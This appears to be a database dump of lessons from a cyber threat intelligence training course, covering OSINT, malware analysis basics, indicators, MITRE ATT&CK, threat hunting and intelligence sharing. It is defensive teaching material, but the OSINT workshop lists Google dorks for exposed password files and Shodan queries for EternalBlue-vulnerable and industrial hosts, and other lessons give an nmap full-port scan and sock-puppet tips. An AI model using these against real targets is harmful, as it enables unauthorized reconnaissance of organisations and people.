(980, 767, '## Types of Threat Intelligence\n\nNot all intelligence is created equal. We categorize CTI into three (sometimes four) main types based on the **Consumer** (who reads it) and the **Horizon** (how long it matters).\n\n---\n\n### 1. Strategic Intelligence\n*   **Audience**: Executives, Board of Directors, CISO.\n*   **Focus**: High-level trends, financial risk, brand reputation, and geopolitics.\n*   **Time Horizon**: Long-term (Years).\n*   **Example Content**:\n    *   \"Ransomware attacks in our industry increased by 200% this quarter.\"\n    *   \"New regulations in the EU will impact our data privacy compliance.\"\n    *   \"The conflict in Region X increases the risk of nation-state cyber retaliation.\"\n*   **Goal**: To inform business decisions, budget allocation, and risk management. **No technical terms.**\n\n### 2. Operational Intelligence\n*   **Audience**: Security Managers, Threat Hunters, Incident Responders.\n*   **Focus**: **TTPs** (Tactics, Techniques, and Procedures). The \"How\" and \"Why\" of an attack.\n*   **Time Horizon**: Mid-term (Weeks to Months).\n*   **Example Content**:\n    *   \"APT29 is using a new technique to bypass Multi-Factor Authentication (MFA).\"\n    *   \"The \'Emotet\' botnet sends phishing emails with subject lines regarding invoices.\"\n    *   \"Adversaries are actively exploiting the PrintNightmare vulnerability.\"\n*   **Goal**: To update security posture, prioritize patching, and guide threat hunting.\n\n### 3. Tactical Intelligence\n*   **Audience**: SOC Analysts, SIEM Administrators, Automated Systems (Firewalls).\n*   **Focus**: **IOCs** (Indicators of Compromise). The specific artifacts left behind.\n*   **Time Horizon**: Short-term (Hours to Days).\n*   **Example Content**:\n    *   **IP Addresses**: `104.22.1.1`\n    *   **File Hashes**: `e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855`\n    *   **Domains**: `evil-phishing-site.com`\n*   **Goal**: Immediate detection and blocking. 
Tactical intel is often automated because it expires quickly (attackers change IPs cheaply).\n\n---\n\n### Comparison Table\n\n| Feature | Strategic | Operational | Tactical |\n| :--- | :--- | :--- | :--- |\n| **Consumer** | C-Suite / Board | SOC Mgr / Hunters | Analysts / Machines |\n| **Content** | Trends / Risk | TTPs / Campaigns | IOCs (Artifacts) |\n| **Lifespan** | Years | Weeks/Months | Hours/Days |\n| **Volume** | Low | Medium | High |\n| **Automated?** | Never | Rarely | Often |\n\n---\n\n### The \"Fourth\" Type: Technical Intelligence\nSome frameworks include a 4th type focused purely on technical tools and malware analysis results (e.g., \"This malware uses XOR encryption with key 0x55\"). This often blends into Operational/Tactical.\n\n### Scenario: The Ransomware Attack\n*   **Tactical**: The Firewall blocks 10 IPs associated with the C2 server.\n*   **Operational**: The Threat Hunter looks for the \"Double Pulsar\" exploit tool because they know this group uses it.\n*   **Strategic**: The CISO presents a report to the Board requesting $2M for offline backups because reliance on cloud sync is a strategic weakness against this specific threat actor.\n\nAll three types work together to protect the organization.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:41:22'),
(981, 768, '## Module 1 Assessment\nPass this quiz to complete the module.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:30:45'),
(982, 769, '## Open Source Intelligence (OSINT)\n\n**OSINT** is data collected from publicly available sources to be used in an intelligence context. \"Open Source\" does not mean \"Open Source Software\" (like Linux). It means **Publicly Accessible Information (PAI)**.\n\nIf it is on the internet and you can access it without hacking a password, it is OSINT.\n\n---\n\n### The OSINT Landscape\nOSINT is vast. It covers:\n1.  **The Surface Web**: Google, News, Company Websites. (4% of web).\n2.  **The Deep Web**: Content not indexed by Search Engines (Databases, Court Records, Wayback Machine).\n3.  **The Dark Web**: Networks requiring specific software (Tor/I2P) to access. Marketplace for stolen data.\n4.  **Social Media**: Twitter, LinkedIn, Instagram, Reddit.\n5.  **Technical Data**: DNS records, WHOIS, SSL Certificates, IP Geolocation.\n\n---\n\n### Passive vs Active Reconnaissance\nThis distinction keeps you out of jail.\n\n#### Passive Reconnaissance (Safe)\nGathering info **without** interacting directly with the target\'s systems.\n*   **Method**: You query Google, Shodan, or Whois.\n*   **Visibility**: The target sees traffic from Google/Shodan, not YOU.\n*   **Risk**: Near Zero.\n*   *Example*: Searching `site:target.com` on Google.\n\n#### Active Reconnaissance (Risky)\nGathering info by **touching** the target.\n*   **Method**: Port Scanning (Nmap), Vulnerability Scanning (Nessus), connecting to their web server.\n*   **Visibility**: Your IP address appears in their Firewall/Web logs.\n*   **Risk**: High. You can be blocked or flagged as an attacker.\n*   *Example*: Running `nmap -sS -p- target.com`.\n\n---\n\n### OPSEC: Operations Security\n\"If you stare into the abyss, the abyss stares back.\"\nWhen you research a Threat Actor or a malicious domain, you must assume they are watching their logs. If they see a request from \"My-Corporate-Laptop\", they know you are on to them.\n\n#### The Golden Rules of Intelligence OPSEC\n1.  
**Never Use Your Real Identity**: Do not use your personal Gmail or corporate email to register for forums.\n2.  **Use a Sock Puppet**: A fake online persona.\n    *   *Name*: Generic but realistic.\n    *   *Photo*: AI Generated (thispersondoesnotexist.com) - avoid reverse image search hits.\n    *   *History*: An empty account looks suspicious. A good sock puppet has months of benign activity.\n3.  **Manage Attribution**:\n    *   **VPN**: Hides your IP.\n    *   **Tor**: Anonymizes your traffic (but beware, Tor exit nodes are public).\n    *   **Virtual Machines (VM)**: Always browse from a disposable VM (like Whonix or Kali). If you get infected, you just delete the VM.\n    *   **User Agents**: Spoof your browser string to blend in.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(983, 770, '## Infrastructure OSINT\n\nAdversaries need infrastructure to attack you. They need Domains for Phishing and IPs for Command & Control (C2). By analyzing this infrastructure, we can pivot and find more of their network.\n\n---\n\n### 1. WHOIS Data\nWHOIS is the registration record for a domain. It tells you:\n*   **Registrar**: GoDaddy, Namecheap, etc.\n*   **Dates**: Creation Date (New domains are suspicious!), Expiry Date.\n*   **Registrant**: Name, Email, Phone.\n*   **Name Servers**: `ns1.hosting.com`.\n\n> ⚠️ **The GDPR Problem**: Since 2018 (GDPR), most personal WHOIS data is \"Redacted for Privacy\". However, historical WHOIS services (like Whoxy or various paid tools) often cached the record *before* it was redacted.\n\n### 2. DNS Enumeration\nDNS is the phonebook of the internet. We want to find every subdomain associated with a target.\n*   **A Record**: Maps `domain.com` -> `1.2.3.4` (IPv4).\n*   **CNAME Record**: Alias. `blog.target.com` -> `wordpress.com`.\n*   **MX Record**: Mail Exchange. Tells you who hosts their email (e.g., `protection.outlook.com` means they use Microsoft 365).\n*   **TXT Record**: Often reveals trust relationships. `include:sending.service.com` in SPF records tells you they use that vendor for marketing emails.\n\n### 3. Certificate Transparency (CT)\nThis is a goldmine for OSINT.\nWhen a Certificate Authority (like Let\'s Encrypt) issues an SSL/TLS certificate, they MUST publish it to a public **Certificate Transparency Log**.\n*   **Why it helps**: If an attacker sets up `phishing.target-login.com` and gets an SSL cert to make it \"secure\", that hostname appears in the public CT logs **immediately**.\n*   **Tool**: `crt.sh`. 
Just search `%target.com` to see every sub-domain they have ever secured.\n\n### Pivot Techniques\n*   **Reverse DNS**: \"What other domains are hosted on this IP?\" (Shared hosting vs Dedicated C2).\n*   **Reverse Analytics**: \"What other websites share this Google Analytics ID?\" (Links attacker sites together).\n*   **Reverse WHOIS**: \"Show me all domains registered by `badguy@evil.com`.\"', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(984, 771, '## Social Media Intelligence (SOCMINT)\n\nPeople are the weakest link. They overshare. SOCMINT exploits this to gather intelligence on targets (employees) or threats (hackers).\n\n---\n\n### Key Platforms\n1.  **LinkedIn**: The #1 source for corporate recon.\n    *   *Attacker View*: \"I need to phish the SysAdmin. I\'ll search LinkedIn for `System Administrator` at `Target Company`. Oh, here is Bob. Bob lists `Cisco ASA` in his skills. Now I know they use Cisco firewalls.\"\n2.  **Twitter / X**: Real-time news ticker.\n    *   Security researchers post 0-days here first.\n    *   Hacktivists announce DDoS attacks here.\n    *   *Search*: `(from:user) until:2023-01-01` (Time travel).\n3.  **Telegram**: The modern \"Dark Web\".\n    *   Ransomware groups run public \"News Channels\" to name-and-shame victims.\n    *   Cybercrime markets sell access and tools in group chats.\n\n### Username Enumeration\nWe are creatures of habit. If my handle is `hacker_123` on Reddit, it is probably `hacker_123` on GitHub and Instagram.\n*   **Concept**: Identity Resolution. Connecting a digital persona across different platforms to build a full profile.\n*   **Tool**: **Sherlock** or **WhatsMyName**. These scripts query hundreds of websites: \"Does `user/hacker_123` exist?\"\n\n### HUMINT (Human Intelligence)\nIn the digital world, this means interacting with people to get info.\n*   **Scenario**: An analyst joins a discord server for a hacking tool and asks \"Does this allow persistence?\" to understand its capabilities.\n*   **Risk**: **Extreme**. Interacting with threat actors can tip them off, create legal exposure for you and your employer, or cross specific legal lines (like providing material support if you buy something).\n*   **Policy**: Most SOCs have a strict \"Passive Only\" policy. You can watch, but you cannot talk.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(985, 772, '## OSINT Tools Workshop\n\nLet\'s get hands-on with the essential toolkit.\n\n### 1. Google Dorking\nUsing advanced search operators to uncover hidden data.\n*   `site:`: Limit results to a domain.\n*   `filetype:`: Look for specific files (pdf, docx, xlsx).\n*   `inurl:`: Look for text in the URL.\n*   `intitle:`: Look for text in the page title.\n\n**recipes**:\n*   *Find Sensitive Files*: `site:target.com filetype:xlsx \"password\"`\n*   *Find Login Portals*: `site:target.com inurl:login`\n*   *Find Open Directories*: `intitle:\"index of /\" \"parent directory\"`\n*   *Public Trello Boards*: `site:trello.com \"password\" OR \"credentials\"`\n\n### 2. Shodan.io\n\"Google for the Internet of Things\". It scans the entire internet (IPv4) 24/7.\n*   **Webcam**: `Server: SQ-WEBCAM`\n*   **Industrial Control Systems**: `port:502` (Modbus)\n*   **RDP (Remote Desktop)**: `port:3389`\n*   **Vulnerability**: `vuln:CVE-2017-0144` (Finds EternalBlue vulnerable hosts).\n*   **Filter**: `org:\"Target Corp\" port:443`\n\n### 3. Maltego\nA link analysis tool used to visualize relationships.\n*   **Input**: A domain (e.g., `google.com`).\n*   **Transform**: A script that runs on the input (e.g., \"To MX Record\").\n*   **Output**: The mail server node.\n*   **Use Case**: Mapping an entire criminal infrastructure from a single email address.\n\n### 4. The Wayback Machine (Archive.org)\nThe internet never forgets.\n*   **Defacement**: See if a site was hacked in the past.\n*   **Job Posts**: Find old job descriptions listing specific software versions that are now vulnerable.\n*   **Deleted Code**: Developers often post secrets (API Keys) to Pastebin or Github and then delete them. Archive sites might catch them.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(986, 773, '## Module 2 Assessment\nPass this quiz to complete the module.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:30:45'),
(987, 774, '## Introduction to Malware Analysis\n\nMalware Analysis is the study of malicious software. Our goal is to understand:\n1.  **Capability**: What can this malware do? (Steal passwords? Encrypt files?).\n2.  **Indicators**: How can we detect it? (Files created, network traffic).\n3.  **Attribution**: Who wrote it? (Rarely successful, but possible).\n\n---\n\n### Static Analysis (Safe & Fast)\nAnalyzing the file **without executing it**. It is like looking at a bomb through an X-ray machine.\n*   **Pros**: Safe. Fast. Can analyze \"dead\" malware (C2 is offline).\n*   **Cons**: Modern malware is \"packed\" (obfuscated) and hides its secrets until runtime.\n*   **Techniques**:\n    *   File Hashing (Fingerprinting).\n    *   Strings Analysis (Finding text).\n    *   PE Header Analysis (Import Table - what DLLs does it need?).\n\n### Dynamic Analysis (Risky & Detailed)\n**Running** the malware in a controlled environment (Sandbox) to watch it explode.\n*   **Pros**: Shows true behavior. Unpacks itself automatically.\n*   **Cons**: Risk of infection/escape. Some malware detects the sandbox and \"plays dead\" (Anti-VM techniques).\n*   **Techniques**:\n    *   Process Monitoring (ProcMon).\n    *   Network Sniffing (Wireshark/Fiddler).\n    *   Registry Watchers.\n\n### The Golden Rule\n**NEVER** analyze malware on your host machine.\n**ALWAYS** use an isolated Virtual Machine (VM) with no shared folders and (preferably) a routed network interface that simulates the internet (like INetSim).', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:43:25'),
(988, 775, '## Key Indicators: Strings & Hashes\n\nThis is \"Basic Static Analysis\". It takes 5 minutes and solves 50% of cases.\n\n### 1. File Hashing\nA hash is a one-way mathematical fingerprint of a file. If you change 1 bit of the file, the hash changes completely.\n*   **MD5**: 32 chars. Fast. Broken (Collisions possible). OK for database lookups.\n*   **SHA-256**: 64 chars. Standard. Collision-resistant (treat as unique).\n*   **Workflow**:\n    1.  Get Sample.\n    2.  `sha256sum malware.exe`.\n    3.  Paste hash into **VirusTotal.com** (look up the hash; do not upload the file itself - submissions are visible to other users and can tip off a targeted attacker).\n    4.  If 50/70 vendors say \"Malicious\", you are done.\n\n### 2. Strings Analysis\nProgrammers leave text in code: URLs, IP addresses, Error Messages, Passwords.\nThe `strings` command extracts all ASCII and Unicode readable text (GNU `strings` only finds ASCII by default; add `-e l` to catch the UTF-16 strings common in Windows binaries).\n*   **Suspicious Strings**:\n    *   `CreateRemoteThread` (Used for Injection).\n    *   `URLDownloadToFile` (Dropper behavior).\n    *   `192.168.x.x` (Internal IPs).\n    *   `cmd.exe /c` (Command execution).\n    *   `C:\\Users\\Target...` (PDB Paths showing the author\'s username!).\n\n### 3. Packing & Entropy\nMalware authors \"Pack\" their code (like a ZIP file) to hide these strings from antivirus.\n*   **Entropy**: Randomness.\n*   **Low Entropy**: Standard English text (lots of repeated patterns like \"the\").\n*   **High Entropy**: Encrypted or Compressed data (looks like random noise).\n*   **Detection**: If a file has Entropy > 7.0 (out of 8), it is likely Packed. You won\'t see any strings until you unpack it.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:43:25'),
(989, 776, '## Module 3 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(990, 777, '## Indicators: IOCs vs IOAs\n\nIn Cyber Threat Intelligence, an **Indicator** is a piece of information that suggests a potential compromise or attack. But not all indicators are created equal.\n\n### 1. Indicators of Compromise (IOC)\nEvidence that a breach has **already occurred**. These are static artifacts.\n*   **The \"Forensic\" Approach**.\n*   **Examples**:\n    *   **MD5 Hash**: `a1b2c3d4...` (A known malware file).\n    *   **IP Address**: `192.168.1.5` (A known C2 server).\n    *   **Domain**: `update-microsoft-support.com` (A phishing site).\n*   **Use Case**: You load these into your Firewall/EDR to **Block** bad things.\n*   **Weakness**: They are easy to change. An attacker can change a file hash in 1 second by adding a null byte.\n\n### 2. Indicators of Attack (IOA)\nEvidence of the **intent** or **behavior** of an attack in progress.\n*   **The \"Real-time\" Approach**.\n*   **Examples**:\n    *   **Lateral Movement**: A user logging into 50 servers in 1 minute.\n    *   **Credential Dumping**: Accessing the `lsass.exe` process memory.\n    *   **Persistence**: Creating a Scheduled Task named \"Updater\" that runs a script in `C:Temp`.\n*   **Use Case**: You write behavioral rules (SIEM/EDR) to detect the *technique*, not the specific file.\n*   **Strength**: Behaviors are hard to change. If an attacker wants to dump credentials, they *must* touch memory somehow.\n\n---\n\n### The Pyramid of Pain\nCreated by David Bianco, this concept illustrates how much pain you cause the adversary when you deny them each indicator type.\n\n1.  **Hash Values (Trivial)**: Attacker just recompiles. NO PAIN.\n2.  **IP Addresses (Easy)**: Attacker rents a new VPS. LOW PAIN.\n3.  **Domain Names (Simple)**: Attacker registers a new domain. LOW PAIN.\n4.  **Network / Host Artifacts (Annoying)**: e.g., \"User Agent String\". Attacker must recode their tool. MEDIUM PAIN.\n5.  **Tools (Challenging)**: e.g., \"Mimikatz\". 
If you detect the *tool*, they must write a new one. HIGH PAIN.\n6.  **TTPs (Tough!)**: Tactics, Techniques, and Procedures. If you detect *how* they behave (e.g., \"Pass the Hash\"), they have to relearn how to hack. **MAXIMUM PAIN**.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(991, 778, '## Traffic Light Protocol (TLP)\n\nIntelligence is useless if not shared, but dangerous if shared too widely. The **Traffic Light Protocol (TLP)** is the global standard for defining \"Who can see this?\"\n\nIt was updated to TLP 2.0 in 2022.\n\n---\n\n### TLP Levels\n\n#### 🔴 TLP:RED (For Your Eyes Only)\n*   **Definition**: Not for disclosure, restricted to participants only.\n*   **Scenario**: A partner sends you a list of compromised employees involved in an internal investigation.\n*   **Action**: You cannot share this with *anyone* outside the specific meeting/email thread. Not even your boss, unless they were named.\n\n#### 🟠 TLP:AMBER (Limited Disclosure)\n*   **Definition**: Limited disclosure, recipients can only spread this on a need-to-know basis within their organization and its clients.\n*   **Scenario**: A vendor tells you about a vulnerability in their software that is actively exploited but no patch exists yet.\n*   **Action**: You can tell your System Admins to block the port. You CANNOT write a blog post about it.\n*   **TLP:AMBER+STRICT**: New in 2.0. Means \"Organization Only\" (No clients).\n\n#### 🟢 TLP:GREEN (Community Wide)\n*   **Definition**: Limited disclosure, restricted to the community.\n*   **Scenario**: An industry ISAC (e.g., Financial-ISAC) shares a list of Phishing domains targeting banks.\n*   **Action**: You can share this with partner organizations and peers. You CANNOT publish it on public Twitter.\n\n#### ⚪ TLP:CLEAR (Public)\n*   **Definition**: Subject to standard copyright rules, otherwise unrestricted.\n*   **Scenario**: A published whitepaper on APT29.\n*   **Action**: Post it on LinkedIn, print it, shout it from the rooftops.\n\n---\n\n### Sharing Standards: STIX & TAXII\nHow do we share this data technically?\n\n1.  **STIX (Structured Threat Information Expression)**: The **Language**.\n    *   It is a JSON format.\n    *   It defines objects like `Attack Pattern`, `Identity`, `Malware`, `Indicator`.\n2.  
**TAXII (Trusted Automated eXchange of Intelligence Information)**: The **Transport**.\n    *   It is the API (HTTPS) that carries the STIX packages.\n    *   Think of STIX as the package and TAXII as the delivery truck.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(992, 779, '## Module 4 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(993, 780, '## MITRE ATT&CK Framework\n\n**Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)**.\nIt is the periodic table of hacker behavior. It moves us away from \"My antivirus blocked a virus\" to \"The adversary used **T1059.001 (PowerShell)** to execute code.\"\n\n### The Hierarchy\n1.  **Tactics (The Goal - \"Why\")**: The column headers. There are 14 tactics in the Enterprise matrix.\n    *   *Examples*: Initial Access, Execution, Persistence, Privilege Escalation, Command and Control.\n2.  **Techniques (The Method - \"How\")**: The cells in the column.\n    *   *Example*: Under \"Initial Access\", you have \"Phishing\" (T1566) and \"Exploit Public-Facing Application\" (T1190).\n3.  **Procedures (The Implementation - \"Specifics\")**: The exact command or tool used.\n    *   *Example*: \"APT33 sent a spearphishing email with a malicious HTA file.\"\n\n### Deep Dive: Technique T1059 (Command and Scripting Interpreter)\nThis is one of the most common techniques.\n*   **Sub-Techniques**:\n    *   `.001 PowerShell`: Windows native automation tool. Loved by hackers because it is installed everywhere.\n    *   `.004 Unix Shell`: Bash/Zsh on Linux/Mac.\n*   **Detection**: You cannot just \"Block PowerShell\". You must look for *malicious use* of PowerShell (e.g., Encoded Commands, Downloads). Enable PowerShell Script Block Logging so the decoded commands are actually recorded in your logs.\n\n### Why use ATT&CK?\n1.  **Common Language**: Red Team says \"I validated T1059\". Blue Team says \"I detected T1059\". Executive says \"We are protected against Scripting attacks\".\n2.  **Gap Analysis**: You can map your defenses against the matrix. \"We have great coverage for Malware (Execution) but zero coverage for Exfiltration\".', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(994, 781, '## MITRE ATT&CK Navigator\n\nThe **Navigator** is an open-source web tool tailored for annotating and visualizing the ATT&CK Matrix. It allows you to create \"Layers\".\n\n### Use Case 1: Threat Profiling\nScenario: You work for a Bank. You are worried about the \"Carbanak\" group.\n1.  Open Navigator.\n2.  Select \"Carbanak\" from the Threat Actor list.\n3.  The tool highlights every technique Carbanak has used in red.\n**Result**: A visual map of your enemy\'s playbook.\n\n### Use Case 2: Defensive Coverage Map\n1.  Create a new Layer.\n2.  Ask your SIEM engineers: \"Can we detect PowerShell?\" (Yes -> Color Green). \"Can we detect Exfiltration over USB?\" (No -> Color Red).\n3.  Fill in the matrix based on your actual capabilities.\n**Result**: A \"You Are Here\" map of your security posture.\n\n### Use Case 3: Overlay (The Gap Analysis)\n1.  Take the **Threat Layer** (Red).\n2.  Take the **Defense Layer** (Green).\n3.  Combine them.\n4.  **The Panic Zone**: Any technique that is colored Red (Threat uses it) but NOT Green (Defense covers it).\n**Result**: This is your immediate roadmap. \"We need to build detections for T1059 because Carbanak uses it and we can\'t see it.\"', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(995, 782, '## Module 5 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(996, 783, '## Introduction to Threat Hunting\n\n**Threat Hunting** is the process of proactively and iteratively searching through networks to detect and isolate advanced threats that avoid existing security solutions.\n\n### The \"Assume Breach\" Paradigm\nTraditional security assumes \"We are safe until the alarm rings.\"\nHunting assumes **\"We are already compromised, we just haven\'t found it yet.\"**\n\n### Types of Hunts\n1.  **Hypothesis Driven**: The scientific method.\n    *   *Hypothesis*: \"Attackers are traversing our network using `PsExec`.\"\n    *   *Test*: Search logs for Event ID 7045 (Service Install) matching PsExec patterns.\n2.  **Intelligence Driven**: Based on a new report.\n    *   *Input*: \"CISA releases report on Volt Typhoon using living-off-the-land binaries.\"\n    *   *Hunt*: Search for the specific behaviors mentioned in the report.\n3.  **Analytics Driven**: Using Math/ML.\n    *   *Input*: \"Show me any user who logged into more than 10 machines in 1 hour.\" (Outlier detection).\n\n### The Hunting Maturity Model (HMM)\n*   **HMM0 (Initial)**: relies primarily on automated alerting. No hunting.\n*   **HMM1 (Minimal)**: Incorporates threat intelligence to drive search.\n*   **HMM2 (Procedural)**: Follows established procedures for hunting. Routine.\n*   **HMM3 (Innovative)**: Creates new hunting methods and automates them.\n*   **HMM4 (Leading)**: Automates the entire process.\n\n### Success Metrics\nHow do you measure a Hunt?\n*   It is **NOT** just \"Finding Bad Guys\". If you hunt for 4 hours and find nothing, that is a success! You proved the network is clean of that specific threat.\n*   **Goal**: Improve Visibility. If you tried to hunt for `PsExec` and couldn\'t because you didn\'t have the right logs, the \"Success\" is identifying that logging gap.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(997, 784, '## Hunting Techniques: Stacking & Clustering\n\nWhen you have 100 Million log events, you can\'t read them all. You need data science techniques to find the needle in the haystack.\n\n### 1. Stacking (Frequency Analysis)\nAlso known as \"Least Frequency Analysis\".\n**Concept**: In a large network, \"Normal\" behaves the same way. \"Evil\" stands out because it is rare.\n\n**Scenario**:\nYou export the \"User Agent\" string from all web traffic in your company.\n1.  **Mozilla/5.0... (Chrome)**: 50,000 counts. (Normal employees).\n2.  **Mozilla/5.0... (Edge)**: 30,000 counts. (Normal employees).\n3.  ...\n4.  **Updates.exe**: 500 counts. (Windows Update).\n5.  **Python-urllib/3.8**: 2 counts. (**Suspicious!**)\n6.  **Kali-Linux**: 1 count. (**Malicious!**).\n\nYou ignore the \"Short Stack\" (High frequency) and investigate the \"Long Tail\" (Low frequency).\n\n### 2. Clustering\nGrouping data points by shared characteristics to find patterns.\n*   **Example**: Grouping all \"svchost.exe\" processes.\n    *   We know `svchost.exe` should usually be spawned by `services.exe`.\n    *   If we cluster by \"Parent Process\", we might see:\n        *   Cluster A: Parent = `services.exe` (Count: 9000).\n        *   Cluster B: Parent = `explorer.exe` (Count: 1). **MALICIOUS**. Services do not run from explorer.\n\n### 3. Box Plotting (Outliers)\nVisualizing data to see who is outside the norm.\n*   \"Average Data Upload per User per Day\": 50MB.\n*   \"User Bob\": 50GB.\nBob is an outlier. He is either backing up his PC or exfiltrating data.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(998, 785, '## Module 6 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(999, 786, '## Threat Intelligence Platform (TIP)\n\nA **TIP** is the heart of a CTI program. It is where you aggregate, analyze, and disseminate intelligence. Without a TIP, you are just managing Spreadsheets of Death.\n\n### Core Functions of a TIP\n\n#### 1. Maximum Aggregation\nYou have 50 sources of intel:\n*   Paid Feeds (CrowdStrike, Mandiant).\n*   Open Source Feeds (AlienVault OTX, Abuse.ch).\n*   ISAC Emails (Financial-ISAC).\n*   Twitter APIs.\nA TIP sucks all of these in automatically via API.\n\n#### 2. Normalization & Deduplication\nIf CrowdStrike reports `IP: 1.2.3.4` as \"Cobalt Strike\" and AlienVault reports `IP: 1.2.3.4` as \"Scanning\", you don\'t want two rows in your database.\nThe TIP merges these into one \"Object\" with two \"tags\".\n\n#### 3. Enrichment (Context)\nWhen an indicator arrives, the TIP asks questions automatically:\n*   **VirusTotal**: \"What is the detection ratio?\"\n*   **Whois**: \"When was this domain registered?\"\n*   **Passive DNS**: \"What domains resolved to this IP in the past?\"\nThis saves the analyst 20 minutes of manual searching per indicator.\n\n#### 4. Dissemination (Integration)\nThe most important part.\n*   **SIEM**: Push High Confidence IOCs to Splunk for detection.\n*   **Firewall**: Push High Confidence IPs to the Edge Firewall for blocking.\n*   **SOAR**: Trigger a playbook to scan endpoints for a file hash.\n\n---\n\n### The TIP Ecosystem\nThe TIP sits in the middle.\n*   **Input**: Feeds -> TIP\n*   **Output**: TIP -> SIEM / Firewall / EDR.\n\n> 💡 **Pro Tip**: Never push \"Raw Feed\" data directly to a Firewall. You block Google DNS by mistake once, and you lose your job. Always filter through a TIP first.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:47:47'),
(1000, 787, '## MISP (Malware Information Sharing Platform)\n\n**MISP** is the de-facto standard for sharing threat intelligence. It is free, open source, and used by NATO, Governments, and 6,000+ organizations.\n\n### The MISP Data Model\nUnderstanding MISP requires understanding its hierarchy:\n\n1.  **Event**: The \"Folder\".\n    *   *Example*: \"Emotet Phishing Campaign - Dec 2024\".\n    *   Contains metadata: Date, Org, TLP Level.\n2.  **Attribute**: The \"File\".\n    *   *Example*: `192.168.1.1` (ip-dst), `malware.exe` (filename).\n    *   **IDS Flag**: If checked, this attribute is exported to NIDS/SIEM.\n3.  **Object**: A template for complex data.\n    *   *Example*: A \"File\" object links `filename`, `md5`, `sha1`, and `size` together so context isn\'t lost.\n4.  **Galaxy (Tags)**: High level context.\n    *   *Threat Actor*: \"APT29\".\n    *   *Mitre technique*: \"T1566 - Phishing\".\n\n### The Sharing Graph\nMISP instances synchronize.\n*   **Pull**: You connect to `CIRCL.lu` (The main European node) and download 50,000 events.\n*   **Push**: You create an event about a new threat and \"Publish\" it. It replicates to all your partners instantly.\n*   **Filter**: You can say \"Pull everything EXCEPT events marked TLP:RED.\"\n\n### Why use MISP?\n*   **Cost**: Free.\n*   **Community**: It is where the community lives.\n*   **Formats**: Exports to STIX, CSV, Snort, Suricata, Bro/Zeek automatically.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:47:47'),
(1001, 788, '## Module 7 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(1002, 789, '## Writing Effective Intelligence Reports\n\nThe best analysis in the world is worthless if the report is confusing.\n\n### 1. The BLUF (Bottom Line Up Front)\nExecutives do not read mystery novels. They want the spoiler on page 1.\n*   **Structure**: State the **Key Judgment** and **Recommendation** in the first paragraph.\n*   *Example*:\n    > **Executive Summary**: We assess with High Confidence that the \"Finance-Payroll\" server is compromised by Ransomware. We recommend immediate network isolation of the entire Finance subnet to prevent spread.\n\n### 2. Words of Estimative Probability (WEP)\nNever use vague words like \"Maybe\", \"Possibly\", or \"Might\". They mean different things to different people.\nStandardize your language (based on Intelligence Community Directives - ICD 203):\n\n| Term | Probability | Meaning |\n|---|---|---|\n| **Almost Certain** | 90-99% | No doubt. Strong evidence. |\n| **Likely / Probable** | 60-90% | Logical, supported by evidence, but gaps exist. |\n| **Roughly Even Chance** | 40-60% | Could go either way. Ambiguous evidence. |\n| **Unlikely** | 10-40% | Evidence suggests this is not the case. |\n| **Remote** | < 10% | Highly improbable. |\n\n*   *Bad*: \"It might be Russia.\"\n*   *Good*: \"We assess with **Moderate Confidence** that the actor is Russian-aligned.\"\n\n### 3. Audience Analysis\nWrite for the reader, not for yourself.\n*   **Strategic Report (CISO/Board)**:\n    *   **Focus**: Impact, Cost, Risk, Trends.\n    *   **Language**: Business English. No \"Hash values\" or \"IPs\".\n    *   **Length**: 1 Page max.\n*   **Operational Report (SOC Manager)**:\n    *   **Focus**: TTPs, Attribution, Campaign timeline.\n    *   **Language**: Technical but explained.\n*   **Tactical Report (Analyst/Engineer)**:\n    *   **Focus**: IOCs, Signatures, Rules.\n    *   **Language**: Raw Data (JSON/CSV). \"Just give me the list.\"\n\n### 4. 
Analysis vs Facts\nClearly separate **what you know** (Facts) from **what you think** (Assessment).\n*   *Fact*: \"The malware communicates with 1.2.3.4.\"\n*   *Assessment*: \"1.2.3.4 is likely a C2 server.\"\nIf you mix them, you mislead the reader.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:47:47'),
(1003, 790, '## Module 8 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
